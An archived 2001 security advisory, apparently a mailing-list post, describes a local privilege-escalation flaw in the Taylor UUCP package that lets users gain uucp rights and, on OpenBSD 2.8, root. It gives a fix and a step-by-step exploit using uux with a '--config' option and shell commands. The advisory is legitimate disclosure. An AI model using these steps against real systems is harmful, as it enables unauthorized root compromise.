******************* Brief description ************* Due to incorrect argument handling in a component of the Taylor UUCP package, it is possible for local users to gain uid/gid uucp. This may allow further elevation, depending on the system, up to and including root access. On OpenBSD 2.8 (and probably others) it allows root compromise. By overwriting the uucp owned program /usr/bin/uustat, arbitrary commands may be executed as part of the /etc/daily crontab script. On Redhat 7.0 (and probably others) it allows creation of empty files as root, and the ability to execute commands as if logged in at the console (as checked via /lib/security/pam_console.so). This may also allow further elevation of privileges, or denial of service. (Tested against uucp-1.06.1-25) Other systems running this package are also affected to a greater or lesser degree. *********************** Solution ****************** Patches should be available very soon, if not already, for most affected systems. If you do not require uucp functionality, you should remove the uucp packages from your system. ********************** The Programs *************** uux (1) - Remote command execution over UUCP If you specify an alternative configuration, it will run as the user that called it, and pass the same configuration to uuxqt. uuxqt (1) - UUCP execution daemon Defaults to allowing rmail and uucp to be run, and nothing else, unless the configuration it is invoked with allows it to run other commands. uucp (1) - Unix to Unix copy If you specify an alternate configuration, it will also run as the user that called it. uuxqt checks the arguments for the programs it is asked to execute and gets rid of what it thinks are the potentially dangerous ones. However, it does not remove long arguments. ******************** The Exploit ****************** uux 'uucp -I/tmp/vv.v /tmp/somefile /tmp/someotherfile' will execute uucp, but will not use the /tmp/vv.v configuration file. However, uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile' will use the supplied configuration, without dropping privileges. 1) Make a configuration file that allows any command to be executed, and allows files from anywhere to be copied to anywhere that is writable by uid/gid uucp. ( /tmp/config.uucp ) 2) Make a command file with the command you want to be executed. ( /tmp/commands.uucp ) 3) Do something like the following: $ THISHOST=`uuname -l` $ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337 $ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT} The commands in /tmp/commands.uucp file will be executed by uuxqt, with the uid/gid of uucp. If you want to perform an exploit, and don't know what to put in the files, you should read the documentation for uucp. (Proof of concept root exploit for OpenBSD was performed on the wargame running OpenBSD 2.8 at damageinc.tv [ http://damageinc.tv ] ) -- zen-parse =========================================================================== http://mp3.com/cosv = Because %49%74%27%73%20%67%6f%6f%64%2e 'gone platinum' = Buy the CD that %74%6f%6f%6b%20%61%67%65%73 = and %73%6f%75%6e%64%73%20%6f%6b =========================================================================== ------------------------------------------------------------------------- The preceding information is confidential and may not be redistributed without explicit permission. Legal action may be taken to enforce this. If this message was posted by zen-parseat_private to a public forum it may be redistributed as long as these conditions remain attached. If you are mum or dad, this probably doesn't apply to you.
This archive was generated by hypermail 2b30 : Sat Sep 08 2001 - 12:23:57 PDT